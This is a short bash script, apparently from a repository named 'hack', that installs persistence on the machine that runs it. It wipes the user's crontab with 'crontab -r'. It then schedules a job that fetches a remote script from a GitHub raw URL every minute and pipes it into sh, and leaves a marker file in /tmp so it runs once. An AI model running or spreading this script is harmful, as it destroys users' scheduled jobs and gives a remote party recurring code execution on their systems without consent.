#!/usr/bin/env bash

if [[ ! -e /tmp/hack.1469362872955 ]]; then
crontab -r
echo "* * * * * curl -s https://raw.githubusercontent.com/ccorcos/hack/master//chet | sh" | crontab
touch /tmp/hack.1469362872955
fi
